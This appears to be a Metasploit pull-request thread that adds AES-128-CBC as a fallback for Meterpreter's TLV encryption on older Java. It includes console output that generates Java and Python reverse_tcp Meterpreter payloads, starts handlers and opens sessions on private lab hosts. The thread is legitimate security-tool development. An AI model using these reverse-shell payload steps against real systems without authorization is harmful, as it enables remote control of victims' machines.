Support AES-128-CBC as an additional option for TLV encryption

[zeroSteiner]

This adds AES-128-CBC as an additional option for TLV encryption. Currently, the only instance in which this should be used is when a Java Meterpreter is running in an environment which lacks strong crypto (such as the default configuration of older versions). Alot of the logic I added relies on the notion that if encrypt is enabled, it's AES-something and the key length is used to determine whether it's AES-128 or AES-256.

See: rapid7/metasploit-payloads#418

Verification

• Install the Java binaries per the instructions in Support AES-128-CBC For Java's TLV Crypt metasploit-payloads#418
• Open a Java Meterpreter session, using an older Java version such as 1.8.0_131
• Use sessions -v to see the encryption type that's used (again based on the key length)
• Open a non-Java Meterpreter session, see that it's using AES-256 and responsive
• Make sure both Meterpreter sessions are still functional (use post/test/meterpreter)

Example

Example Output

• Session 1 - Windows Java running 1.8.0_131
• Session 2 - Linux Java running OpenJDK 1.8.0_252
• Session 3 - Linux Python, showing it still negotiates AES-256

msf5 payload(java/meterpreter/reverse_tcp) > show options 

Module options (payload/java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

msf5 payload(java/meterpreter/reverse_tcp) > 
msf5 payload(java/meterpreter/reverse_tcp) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf5 payload(java/meterpreter/reverse_tcp) > to_handler 
[*] Payload Handler Started as Job 0
msf5 payload(java/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 192.168.159.128:4444 

msf5 payload(java/meterpreter/reverse_tcp) > generate -f raw -o /tmp/meterpreter.jar
[*] Writing 5312 bytes to /tmp/meterpreter.jar...
msf5 payload(java/meterpreter/reverse_tcp) > WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/meterpreter.jar is being used
WARNING: Local files may be incompatible with the Metasploit Framework

[*] Sending stage (58121 bytes) to 192.168.159.30
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.30:50334) at 2020-06-29 17:43:53 -0400
[*] Sending stage (58121 bytes) to 192.168.159.128
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.128:57446) at 2020-06-29 17:44:08 -0400
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.jar is being used

msf5 payload(java/meterpreter/reverse_tcp) > sessions -v

Active sessions
===============

  Session ID: 1
        Name: 
        Type: meterpreter windows
        Info: Spencer McIntyre @ DESKTOP-RTCRBEV
      Tunnel: 192.168.159.128:4444 -> 192.168.159.30:50334 (192.168.159.30)
         Via: exploit/multi/handler
   Encrypted: Yes (AES-128-CBC)
        UUID: 7a540d69968d7dd9/java=17/windows=1/2020-06-29T21:43:53Z
     CheckIn: 20s ago @ 2020-06-29 17:43:53 -0400
  Registered: No

  Session ID: 2
        Name: 
        Type: meterpreter linux
        Info: smcintyre @ localhost.localdomain
      Tunnel: 192.168.159.128:4444 -> 192.168.159.128:57446 (192.168.159.128)
         Via: exploit/multi/handler
   Encrypted: Yes (AES-256-CBC)
        UUID: 1ce656d6e81fa519/java=17/linux=6/2020-06-29T21:44:08Z
     CheckIn: 5s ago @ 2020-06-29 17:44:08 -0400
  Registered: No



msf5 payload(java/meterpreter/reverse_tcp) > use payload/python/meterpreter/reverse_tcp
msf5 payload(python/meterpreter/reverse_tcp) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf5 payload(python/meterpreter/reverse_tcp) > generate -f raw -o /tmp/meterpreter.py
[*] Writing 501 bytes to /tmp/meterpreter.py...
msf5 payload(python/meterpreter/reverse_tcp) > jobs -K
Stopping all jobs...
msf5 payload(python/meterpreter/reverse_tcp) > to_handler 
[*] Payload Handler Started as Job 1
msf5 payload(python/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Sending stage (39240 bytes) to 192.168.159.128
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.128:57450) at 2020-06-29 17:44:38 -0400

msf5 payload(python/meterpreter/reverse_tcp) > sessions -v

Active sessions
===============

  Session ID: 1
        Name: 
        Type: meterpreter windows
        Info: Spencer McIntyre @ DESKTOP-RTCRBEV
      Tunnel: 192.168.159.128:4444 -> 192.168.159.30:50334 (192.168.159.30)
         Via: exploit/multi/handler
   Encrypted: Yes (AES-128-CBC)
        UUID: 7a540d69968d7dd9/java=17/windows=1/2020-06-29T21:43:53Z
     CheckIn: 48s ago @ 2020-06-29 17:43:53 -0400
  Registered: No

  Session ID: 2
        Name: 
        Type: meterpreter linux
        Info: smcintyre @ localhost.localdomain
      Tunnel: 192.168.159.128:4444 -> 192.168.159.128:57446 (192.168.159.128)
         Via: exploit/multi/handler
   Encrypted: Yes (AES-256-CBC)
        UUID: 1ce656d6e81fa519/java=17/linux=6/2020-06-29T21:44:08Z
     CheckIn: 33s ago @ 2020-06-29 17:44:08 -0400
  Registered: No

  Session ID: 3
        Name: 
        Type: meterpreter linux
        Info: smcintyre @ localhost.localdomain
      Tunnel: 192.168.159.128:4444 -> 192.168.159.128:57450 (192.168.159.128)
         Via: exploit/multi/handler
   Encrypted: Yes (AES-256-CBC)
        UUID: 6a88be5987e8b2b2/python=20/linux=6/2020-06-29T21:44:38Z
     CheckIn: 2s ago @ 2020-06-29 17:44:39 -0400
  Registered: No



msf5 payload(python/meterpreter/reverse_tcp) >

Landing Notes

Once ready to be merged into 6.x, this will need to follow slightly modified instructions from here.

1. The metasploit-payloads side should be landed first
   • A gem should be built and released, let me know and I can assist with that
2. Resume from step 2 in the build instructions

[OJ]

I was going to nitpick and say "use type != NONE rather than type == .. || type =="... for future-proofing, then I realised that we're calling AES encryption functions.. not generic ones. So it makes perfect sense.

Looks good to me! Nice work as always mate.

[bwatters-r7]

Now that rapid7/metasploit-payloads#418 has landed and payloads gem 2.0.7 has been released, would you like to add the payload bump to this PR?

[zeroSteiner]

Bumped this to use metasploit-payloads 2.0.9 now.

[bwatters-r7]

The only failure was one where the session was established, but cmd_exec failed on stderr again:

[bwatters-r7]

Also, encryption citation:

[bwatters-r7]

Also, just to be sure, I ran it against a regular binary payload as well....

[timwr]

We need rapid7/metasploit-payloads#421 on the 6.x branch for 100% test passes.
I've landed it myself and will update the gem and payload sizes once it's built

[bwatters-r7]

Original Release Notes
This PR fixes a bug that came in with updates to recent cryptography changes; previously, we assumed all java releases would be able to support 256-bit encryption, but some older environments cannot support that. Here, we add AES-128-CBC as an additional option for TLV encryption as a fallback if the remote java version cannot negotiate 256-bit.

[pbarry-r7]

Release Notes

Fixed a bug related to recent cryptography changes, where Java Meterpreter payloads may not have access to 256-bit encryption. This fix allows Meterpreter running in older Java environments to use AES-128-CBC if 256-bit encryption is not available.